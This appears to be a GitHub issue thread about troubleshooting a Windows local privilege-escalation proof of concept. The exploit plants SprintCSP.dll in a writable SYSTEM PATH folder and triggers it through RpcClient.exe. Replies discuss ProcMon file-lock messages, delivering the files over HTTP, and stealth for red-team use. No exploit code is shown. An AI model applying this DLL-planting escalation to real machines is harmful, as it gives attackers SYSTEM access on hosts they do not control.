So I have this Windows 10 21H2 with the following precise version :

I build both RpcClient.exe and SprintCSP.dll without changing anyhting, I kept the default command in the DLL as for the define macro. I have a writable SYSTEM path "C:\python" where I put the DLL, I monitored the execution of RpcClient.exe with ProcMon and I can see the loading of the DLL :

It is laoded while I start RpcClient but the command is not executed (I tried different commands).

I noticed this error :

I tried changing autorisations to full for everybody but it didn't do anything.

What is the problem? What did I do wrong?

Feel free to ask me for more informations
(Obviously Windows Defender is asleep)

Edit: I tried with a Windows 10 21H1 version 10.0.19043.928 and I get the same result, search a bit through Internet for "FILE LOCKED ONLY FOR READERS" and it may seems linked with the fact that the files (.dll and .exe) come from a Shared folder (VMware shared folder between the victim VM and my host), I'll try to compile everything on the VM.

Second edit: i actually build everything on the target machine and it worked. But building everything on the machine you want to privesc is not really stealth and accurate for redteam. Do you know why I get the error in ProcMon when i compile files on my host machine and not on the target?

Hi @thomsoe,

As far as I know, the "FILE LOCKED ONLY FOR READERS" message is not an error code, it actually means that the file has been read properly but the content can not be modified until the lock is released.
I don't really know why the command is not executed while using a VMware's shared folder, but it definitely has nothing to do with the PoC itself. I recommend you to try to deliver the .exe and the .dll in a different way, maybe in a zip file through HTTP. This way it should work properly.

On the other hand, as you say it is not a good practice to compile the code in the target machine, but it is not required at all in order to make it work.